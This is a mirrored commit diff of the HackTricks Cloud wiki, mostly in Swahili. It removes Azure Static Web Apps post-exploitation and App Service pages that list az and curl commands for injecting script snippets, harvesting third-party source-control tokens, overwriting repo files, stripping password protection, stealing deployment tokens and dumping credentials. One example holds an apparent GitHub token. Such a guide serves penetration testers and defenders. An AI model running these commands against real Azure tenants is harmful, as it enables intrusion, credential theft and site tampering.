gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-10 20:23:28 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-enumeration-tools.md

Browse Source
This commit is contained in:
Translator
2025-01-09 08:11:44 +00:00
parent d5ea980f0e
commit bbd69e7771
373 changed files with 5 additions and 557 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
src/pentesting-cloud/azure-security/az-enumeration-tools.md
View File

@@ -53,7 +53,7 @@ brew upgrade powershell
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Amri katika Azure CLI zimeundwa kwa kutumia muundo wa: `az <service> <action> <parameters>`
Amri katika Azure CLI zimejengwa kwa kutumia muundo wa: `az <service> <action> <parameters>`
#### Debug | MitM az cli
@@ -61,7 +61,7 @@ Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo
```bash
az account management-group list --output table --debug
```
Ili kufanya **MitM** kwa chombo na **kuangalia maombi yote** yanayotumwa kwa mikono unaweza kufanya:
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
{{#tabs }}
{{#tab name="Bash" }}
@@ -107,7 +107,7 @@ Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikon
### Microsoft Graph PowerShell
Microsoft Graph PowerShell ni SDK ya jukwaa nyingi inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, identiti za nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini wa ruhusa, inahakikisha shughuli salama na inapata masasisho ya kawaida ili kuendana na vipengele vya hivi punde vya Microsoft Graph API.
Microsoft Graph PowerShell ni SDK ya jukwaa nyingi inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, identiti za nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini kabisa, inahakikisha shughuli salama na inapokea masasisho ya mara kwa mara ili kuendana na vipengele vya hivi punde vya Microsoft Graph API.
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
@@ -127,3 +127,5 @@ Moduli ya Azure Active Directory (AD), sasa **imeondolewa**, ni sehemu ya Azure
> Hii imebadilishwa na Microsoft Graph PowerShell
Fuata kiungo hiki kwa ajili ya [**maelekezo ya usakinishaji**](https://www.powershellgallery.com/packages/AzureAD).
{{#include ../../banners/hacktricks-training.md}}

162
src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
View File

@@ -1,162 +0,0 @@
# Az - Static Web Apps Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Azure Static Web Apps
Kwa maelezo zaidi kuhusu huduma hii angalia:
{{#ref}}
../az-services/az-static-web-apps.md
{{#endref}}
### Microsoft.Web/staticSites/snippets/write
Inawezekana kufanya ukurasa wa wavuti wa static upakue msimbo wa HTML wa kiholela kwa kuunda snippet. Hii inaweza kumruhusu mshambuliaji kuingiza msimbo wa JS ndani ya programu ya wavuti na kuiba taarifa nyeti kama vile akidi au funguo za mnemonic (katika pochi za web3).
Amri ifuatayo inaunda snippet ambayo kila wakati itapakuliwa na programu ya wavuti::
```bash
az rest \
--method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"name": "supersnippet",
"location": "Body",
"applicableEnvironmentsMode": "AllEnvironments",
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
"environments": [],
"insertBottom": false
}
}'
```
### Soma Akikodi za Watu wa Tatu Zilizowekwa
Kama ilivyoelezwa katika sehemu ya App Service:
{{#ref}}
../az-privilege-escalation/az-app-services-privesc.md
{{#endref}}
Kukimbia amri ifuatayo inawezekana **kusoma akidi za watu wa tatu** zilizowekwa katika akaunti ya sasa. Kumbuka kwamba ikiwa kwa mfano akidi za Github zimewekwa kwa mtumiaji tofauti, huwezi kupata token kutoka kwa mwingine.
```bash
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```
Amri hii inarudisha tokeni za Github, Bitbucket, Dropbox na OneDrive.
Hapa kuna mifano ya amri za kuangalia tokeni:
```bash
# GitHub List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
```
### Overwrite file - Overwrite routes, HTML, JS...
Ni uwezekano wa **kuandika tena faili ndani ya repo ya Github** inayoshikilia programu kupitia Azure kwa kutumia **Github token** kutuma ombi kama ifuatavyo ambalo litabainisha njia ya faili ya kuandika tena, maudhui ya faili na ujumbe wa commit.
Hii inaweza kutumiwa vibaya na washambuliaji kubadilisha **maudhui ya programu ya wavuti** ili kutoa maudhui mabaya (kuchukua taarifa za kuingia, funguo za mnemonic...) au tu **kurekebisha njia fulani** kwa seva zao wenyewe kwa kuandika tena faili ya `staticwebapp.config.json`.
> [!WARNING]
> Kumbuka kwamba ikiwa mshambuliaji atafanikiwa kuathiri repo ya Github kwa njia yoyote, wanaweza pia kuandika faili moja kwa moja kutoka Github.
```bash
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
-H "Content-Type: application/json" \
-d '{
"commit": {
"message": "Update static web app route configuration",
"branchName": "main",
"committer": {
"name": "Azure App Service",
"email": "donotreply@microsoft.com"
},
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
"filePath": "staticwebapp.config.json",
"message": "Update static web app route configuration",
"repoName": "carlospolop/my-first-static-web-app",
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
},
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
}'
```
### Microsoft.Web/staticSites/config/write
Kwa ruhusa hii, inawezekana **kubadilisha nenosiri** linalolinda programu ya wavuti ya statiki au hata kuondoa ulinzi wa kila mazingira kwa kutuma ombi kama ifuatavyo:
```bash
# Change password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"password": "SuperPassword123.",
"secretUrl": "",
"applicableEnvironmentsMode": "AllEnvironments"
}
}'
# Remove the need of a password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"secretUrl": "",
"applicableEnvironmentsMode": "SpecifiedEnvironments",
"secretState": "None"
}
}'
```
### Microsoft.Web/staticSites/listSecrets/action
Ruhusa hii inaruhusu kupata **API key deployment token** kwa ajili ya programu ya static.
Token hii inaruhusu kupeleka programu
```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
```
Kisha, ili kuboresha programu unaweza kuendesha amri ifuatayo. Kumbuka kwamba amri hii ilipatikana kwa kuangalia **jinsi Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) inavyofanya kazi**, kwani ndiyo ambayo Azure imeweka kama chaguo-msingi kutumika. Hivyo picha na mipangilio vinaweza kubadilika katika siku zijazo.
1. Pakua repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (au repo nyingine yoyote unayotaka kupeleka) na uendeshe `cd react-basic`.
2. Badilisha msimbo unayotaka kupeleka
3. Upeleke kwa kuendesha (Kumbuka kubadilisha `<api-token>`):
```bash
docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
```
### Microsoft.Web/staticSites/write
Kwa ruhusa hii inawezekana **kubadilisha chanzo cha programu ya wavuti isiyo na mabadiliko kuwa hifadhi tofauti ya Github**, hata hivyo, haitapatikana kiotomatiki kwani hii inapaswa kufanywa kutoka kwa Kitendo cha Github kawaida kwa kutumia tokeni ambayo ilihalalisha kitendo hicho kwani tokeni hii haiwezi kusasishwa kiotomatiki ndani ya siri za Githb za hifadhi (inaongezwa tu kiotomatiki wakati programu inaundwa).
```bash
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
```
### Microsoft.Web/staticSites/resetapikey/action
Kwa ruhusa hii inawezekana **kurekebisha funguo za API za programu ya wavuti isiyohamishika** ambayo inaweza kusababisha DoS kwa michakato inayotumia kiotomatiki kupeleka programu hiyo.
```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
```
{{#include ../../../banners/hacktricks-training.md}}

273
src/pentesting-cloud/azure-security/az-services/az-app-service.md
View File

@@ -1,273 +0,0 @@
# Az - App Services
{{#include ../../../banners/hacktricks-training.md}}
## App Service Basic Information
Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma ya programu za simu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha kazi na usimamizi.
Kila programu inafanya kazi ndani ya sandbox lakini kutengwa kunategemea mipango ya App Service
- Programu katika ngazi za Bure na Kushiriki zinafanya kazi kwenye VMs zinazoshirikiwa
- Programu katika ngazi za Kawaida na Kitaalamu zinafanya kazi kwenye VMs zilizotengwa
> [!WARNING]
> Kumbuka kwamba **hakuna** ya kutengwa hizo **inaepusha** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
Programu zina mipangilio ya kuvutia:
- **Daima Iko**: Inahakikisha kwamba programu inafanya kazi kila wakati. Ikiwa haijawashwa, programu itasimama kufanya kazi baada ya dakika 20 za kutokuwa na shughuli na itaanza tena wakati ombi litakapopokelewa.
- Hii ni muhimu ikiwa una kazi ya wavuti inayohitaji kufanya kazi bila kukatika kwani kazi ya wavuti itasimama ikiwa programu itasimama.
- **SSH**: Ikiwa imewashwa, mtumiaji mwenye ruhusa ya kutosha anaweza kuungana na programu kwa kutumia SSH.
- **Kusafisha**: Ikiwa imewashwa, mtumiaji mwenye ruhusa ya kutosha anaweza kusafisha programu. Hata hivyo, hii inazuiliwa kiotomatiki kila masaa 48.
- **Programu ya Wavuti + Hifadhidata**: Kihifadhi cha wavuti kinaruhusu kuunda Programu yenye hifadhidata. Katika kesi hii inawezekana kuchagua hifadhidata ya kutumia (SQLAzure, PostgreSQL, MySQL, MongoDB) na pia inaruhusu kuunda Cache ya Azure kwa Redis.
- URL inayoshikilia taarifa za kuingia kwa hifadhidata na Redis itahifadhiwa katika **appsettings**.
- **Konteina**: Inawezekana kupeleka konteina kwa App Service kwa kuashiria URL ya konteina na taarifa za kuingia ili kuweza kuipata.
## Basic Authentication
Wakati wa kuunda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwe umewashwa. Hii kimsingi **inawezesha SCM na FTP** kwa programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\
Zaidi ya hayo ili kuungana nazo, Azure inatoa **API inayoruhusu kupata jina la mtumiaji, nenosiri na URL** ya kuungana na seva za SCM na FTP.
Inawezekana kuungana na SCM kwa kutumia kivinjari cha wavuti katika `https://<SMC-URL>/BasicAuth` na kuangalia faili zote na upelelezi huko.
### Kudu
Kudu ni **injini ya upelelezi na jukwaa la usimamizi kwa Azure App Service na Function Apps**, ikitoa upelelezi wa msingi wa Git, kusafisha kwa mbali, na uwezo wa usimamizi wa faili kwa programu za wavuti. Inapatikana kupitia URL ya SCM ya programu ya wavuti.
Kumbuka kwamba toleo la Kudu linalotumiwa na App Services na na Function Apps ni tofauti, toleo la Function apps likiwa na mipaka zaidi.
Baadhi ya maeneo ya kuvutia unaweza kuyapata katika Kudu ni:
- `/DebugConsole`: Kihifadhi kinachokuruhusu kutekeleza amri katika mazingira ambapo Kudu inafanya kazi.
- Kumbuka kwamba mazingira haya **hayana ufikiaji** wa huduma ya metadata ili kupata tokens.
- `/webssh/host`: Mteja wa SSH wa wavuti unaokuruhusu kuungana ndani ya konteina ambapo programu inafanya kazi.
- Hali hii **ina ufikiaji wa huduma ya metadata** ili kupata tokens kutoka kwa utambulisho wa usimamizi uliotolewa.
- `/Env`: Pata taarifa kuhusu mfumo, mipangilio ya programu, mabadiliko ya mazingira, nyuzi za muunganisho na vichwa vya HTTP.
- `/wwwroot/`: Katalogi ya mzizi ya programu ya wavuti. Unaweza kupakua faili zote kutoka hapa.
## Sources
App Services inaruhusu kupakia msimbo kama faili ya zip kwa default, lakini pia inaruhusu kuungana na huduma ya mtu wa tatu na kupata msimbo kutoka huko.
- Vyanzo vya mtu wa tatu vinavyoungwa mkono kwa sasa ni **Github** na **Bitbucket**.
- Unaweza kupata tokens za uthibitishaji kwa kukimbia `az rest --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"`
- Azure kwa default itaunda **Github Action** ili kupeleka msimbo kwa App Service kila wakati msimbo unaposasishwa.
- Pia inawezekana kuashiria **hifadhi ya git ya mbali** (ikiwa na jina la mtumiaji na nenosiri) ili kupata msimbo kutoka huko.
- Unaweza kupata taarifa za kuingia kwa hifadhi ya mbali kwa kukimbia `az webapp deployment source show --name <app-name> --resource-group <res-group>` au `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- Pia inawezekana kutumia **Azure Repository**.
- Pia inawezekana kuunda **hifadhi ya git ya ndani**.
- Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name <app-name> --resource-group <res-group>` na itakuwa URL ya SCM ya programu.
- Ili kuikopi unahitaji taarifa za kuingia za SCM ambazo unaweza kupata kwa `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`
## Webjobs
Azure WebJobs ni **kazi za nyuma zinazofanya kazi katika mazingira ya Azure App Service**. Zinawaruhusu waendelezaji kutekeleza skripti au programu pamoja na programu zao za wavuti, na kufanya iwe rahisi kushughulikia shughuli zisizo za kawaida au zinazohitaji muda kama vile usindikaji wa faili, usimamizi wa data, au kazi za ratiba.
Kuna aina 2 za kazi za wavuti:
- **Kudumu**: Inafanya kazi bila kikomo katika mzunguko na inasababishwa mara tu inapotengenezwa. Ni bora kwa kazi zinazohitaji usindikaji wa mara kwa mara. Hata hivyo, ikiwa programu itasimama kufanya kazi kwa sababu Daima Iko haijawashwa na haijapokea ombi katika dakika 20 zilizopita, kazi ya wavuti pia itasimama.
- **Iliyosababishwa**: Inafanya kazi kwa ombi au kulingana na ratiba. Inafaa zaidi kwa kazi za mara kwa mara, kama vile masasisho ya data ya kundi au taratibu za matengenezo.
Webjobs ni za kuvutia sana kutoka kwa mtazamo wa washambuliaji kwani zinaweza kutumika **kutekeleza msimbo** katika mazingira na **kuinua mamlaka** kwa utambulisho wa usimamizi uliounganishwa.
Zaidi ya hayo, kila wakati ni ya kuvutia kuangalia **kumbukumbu** zinazozalishwa na Webjobs kwani zinaweza kuwa na **taarifa nyeti**.
### Slots
Azure App Service Slots zinatumika **kupeleka toleo tofauti la programu** kwa App Service moja. Hii inaruhusu waendelezaji kujaribu vipengele au mabadiliko mapya katika mazingira tofauti kabla ya kupeleka kwenye mazingira ya uzalishaji.
Zaidi ya hayo, inawezekana kuelekeza **asilimia ya trafiki** kwa slot maalum, ambayo ni muhimu kwa **A/B testing**, na kwa madhumuni ya nyuma ya mlango.
### Azure Function Apps
Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye kihifadhi cha wavuti na kuorodhesha huduma zote za programu au kutekeleza `az webapp list` katika az cli utaweza **kuona Function apps pia zimeorodheshwa hapa**.
Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** App services hutumia (`webapp` katika az cli), pia **vinatumika na Function apps**.
### Enumeration
{{#tabs }}
{{#tab name="az" }}
```bash
# List webapps
az webapp list
## Less information
az webapp list --query "[].{hostName: defaultHostName, state: state, name: name, resourcegroup: resourceGroup}" -o table
## Get SCM URL of each webapp
az webapp list | grep '"name"' | grep "\.scm\." | awk '{print $2}' | sed 's/"//g'
# Get info about 1 app
az webapp show --name <name> --resource-group <res-group>
# Get instances of a webapp
az webapp list-instances --name <name> --resource-group <res-group>
## If you have enough perm you can go to the "consoleUrl" and access a shell inside the instance form the web
# Get access restrictions of an app
az webapp config access-restriction show --name <name> --resource-group <res-group>
# Remove access restrictions
az webapp config access-restriction remove --resource-group <res-group> -n <name> --rule-name <rule-name>
# Get connection strings of a webapp
az webapp config connection-string list --name <name> --resource-group <res-group>
# Get appsettings of an app
az webapp config appsettings list --name <name> --resource-group <res-group>
# Get SCM and FTP credentials
az webapp deployment list-publishing-profiles --name <name> --resource-group <res-group>
# Get configured Auth information
az webapp auth show --name <app-name> --resource-group <res-group>
# Get backups of a webapp
az webapp config backup list --webapp-name <name> --resource-group <res-group>
# Get backups scheduled for a webapp
az webapp config backup show --webapp-name <name> --resource-group <res-group>
# Get snapshots
az webapp config snapshot list --resource-group <res-group> -n <name>
# Restore snapshot
az webapp config snapshot restore -g <res-group> -n <name> --time 2018-12-11T23:34:16.8388367
# Get slots
az webapp deployment slot list --name <AppName> --resource-group <ResourceGroupName> --output table
az webapp show --slot <SlotName> --name <AppName> --resource-group <ResourceGroupName>
# Get traffic-routing
az webapp traffic-routing show --name <AppName> --resource-group <ResourceGroupName>
# Get used container by the app
az webapp config container show --name <name> --resource-group <res-group>
# Get storage account configurations of a webapp
az webapp config storage-account list --name <name> --resource-group <res-group>
# Get configured container (if any) in the webapp, it could contain credentials
az webapp config container show --name <name> --resource-group <res-group>
# Get Webjobs
az webapp webjob continuous list --resource-group <res-group> --name <app-name>
az webapp webjob triggered list --resource-group <res-group> --name <app-name>
# Read webjobs logs with Azure permissions
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt" --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt" --resource "https://management.azure.com/"
# Read webjobs logs with SCM credentials
curl "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/lala/job_log.txt" \
--user '<username>:<password>' -v
# Get connections of a webapp
az webapp conection list --name <name> --resource-group <res-group>
# Get hybrid-connections of a webapp
az webapp hybrid-connections list --name <name> --resource-group <res-group>
```
{{#endtab }}
{{#tab name="Az Powershell" }}
```powershell
# Get App Services and Function Apps
Get-AzWebApp
# Get only App Services
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
```
{{#endtab }}
{{#tab name="az pata yote" }}
```bash
#!/bin/bash
# Get all App Service and Function Apps
# Define Azure subscription ID
azure_subscription="your_subscription_id"
# Log in to Azure
az login
# Select Azure subscription
az account set --subscription $azure_subscription
# Get all App Services in the specified subscription
list_app_services=$(az appservice list --query "[].{appServiceName: name, group: resourceGroup}" -o tsv)
# Iterate over each App Service
echo "$list_app_services" | while IFS=$'\t' read -r appServiceName group; do
# Get the type of the App Service
service_type=$(az appservice show --name $appServiceName --resource-group $group --query "kind" -o tsv)
# Check if it is a Function App and print its name
if [ "$service_type" == "functionapp" ]; then
echo "Function App Name: $appServiceName"
fi
done
```
{{#endtab }}
{{#endtabs }}
#### Pata akreditif na kupata ufikiaji wa msimbo wa wavuti
```bash
# Get connection strings that could contain credentials (with DBs for example)
az webapp config connection-string list --name <name> --resource-group <res-group>
## Check how to use the DBs connection strings in the SQL page
# Get credentials to access the code and DB credentials if configured.
az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>
# Get git URL to access the code
az webapp deployment source config-local-git --resource-group <res-group> -n <name>
# Access/Modify the code via git
git clone 'https://<username>:<password>@name.scm.azurewebsites.net/repo-name.git'
## In my case the username was: $nameofthewebapp and the password some random chars
## If you change the code and do a push, the app is automatically redeployed
```
{{#ref}}
../az-privilege-escalation/az-app-services-privesc.md
{{#endref}}
## Mifanozo ya kuunda Web Apps
### Python kutoka kwa eneo
Hii tutorial inategemea ile kutoka [https://learn.microsoft.com/en-us/azure/app-service/quickstart-python](https://learn.microsoft.com/en-us/azure/app-service/quickstart-python?tabs=flask%2Cwindows%2Cazure-cli%2Cazure-cli-deploy%2Cdeploy-instructions-azportal%2Cterminal-bash%2Cdeploy-instructions-zip-azcli).
```bash
# Clone repository
git clone https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart
cd msdocs-python-flask-webapp-quickstart
# Create webapp from this code
az webapp up --runtime PYTHON:3.9 --sku B1 --logs
```
Kuingia kwenye lango la SCM au kuingia kupitia FTP inawezekana kuona katika `/wwwroot` faili iliyo na muundo `output.tar.gz` ambayo ina msimbo wa webapp.
> [!TIP]
> Kuungana tu kupitia FTP na kubadilisha faili `output.tar.gz` haitoshi kubadilisha msimbo unaotekelezwa na webapp.
**Mshambuliaji anaweza kupakua faili hii, kuibadilisha, na kuipakia tena ili kutekeleza msimbo wowote katika webapp.**
### Python kutoka Github
Mafunzo haya yanategemea yale ya awali lakini yanatumia hazina ya Github.
1. Fork hazina msdocs-python-flask-webapp-quickstart katika akaunti yako ya Github.
2. Unda Web App mpya ya python katika Azure.
3. Katika `Deployment Center` badilisha chanzo, ingia na Github, chagua hazina iliyoforked na bonyeza `Save`.
Kama katika kesi ya awali, kuingia kwenye lango la SCM au kuingia kupitia FTP inawezekana kuona katika `/wwwroot` faili iliyo na muundo `output.tar.gz` ambayo ina msimbo wa webapp.
> [!TIP]
> Kuungana tu kupitia FTP na kubadilisha faili `output.tar.gz` na kuanzisha tena uanzishaji haitoshi kubadilisha msimbo unaotekelezwa na webapp.
## Marejeleo
- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
{{#include ../../../banners/hacktricks-training.md}}